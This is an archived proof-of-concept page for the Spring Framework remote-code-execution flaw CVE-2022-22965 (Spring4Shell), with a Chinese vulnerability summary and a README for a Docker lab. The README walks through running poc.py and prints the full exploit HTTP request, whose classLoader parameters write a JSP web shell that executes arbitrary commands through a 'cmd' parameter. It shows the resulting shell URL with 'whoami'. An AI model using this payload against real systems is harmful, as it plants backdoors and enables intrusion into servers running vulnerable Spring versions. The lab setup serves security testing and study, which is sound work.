关联漏洞
标题:
Spring Framework 代码注入漏洞
(CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
描述
Spring4Shell - CVE-2022-22965
介绍
# Spring4Shell - CVE-2022-22965
## Build
- let's clone the repository, build and run the container
```bash
$ git clone https://github.com/twseptian/cve-2022-22965.git
$ cd cve-2022-22965
$ docker build . -t spring4shell-poc
$ docker run -p 8080:8080 --name spring4shell-poc spring4shell-poc
```
- check the access using browser `http://172.17.0.2:8080/spring-form/greeting`
## PoC
- we add proxy on the `poc.py`.
```bash
[SNIP]
proxies = {'http':'http://127.0.0.1:8081','https':'https://127.0.0.1:8081'} #proxy configuration
[SNIP]
...
[SNIP]
try:
requests.post(self.url,
headers=headers,
data=data,
timeout=15,
allow_redirects=False,
verify=False, proxies=proxies)
[SNIP]
```
- run the `poc.py` with following command.
```bash
$ python3 poc.py --url http://172.17.0.2:8080/spring-form/greeting
Vulnerable,shell url: http://172.17.0.2:8080/tomcatwar.jsp?pwd=j&cmd=whoami
```
**NOTE**: Thanks to [Spring4Shell PoC Application](https://github.com/reznok/Spring4Shell-POC) for the python's exploit
- while the exploit generates a shell url, we can intercept the post request using burpsuite
```bash
POST /spring-form/greeting HTTP/1.1
Host: 172.17.0.2:8080
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 762
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
```
**NOTE**: you can analyze the request by yourself #lul
- the exploit will generate the shell url. we can access the url on the browser to take a remote code execution from target.
## References
- [Spring4Shell PoC Application](https://github.com/reznok/Spring4Shell-POC)
- [Spring4Shell-POC (CVE-2022-22965)](https://github.com/BobTheShoplifter/Spring4Shell-POC)
文件快照
[4.0K] /data/pocs/2768d9ada22730c3ac3824366ff3c16585f74133
├── [4.0K] app
│ └── [ 18M] spring-form.war
├── [ 145] Dockerfile
├── [3.7K] poc.py
├── [2.8K] README.md
└── [4.0K] screenshots
├── [ 70K] docker_run.png
├── [ 11K] poc.png
├── [307K] shell_url2.png
└── [ 93K] shell_url.png
2 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。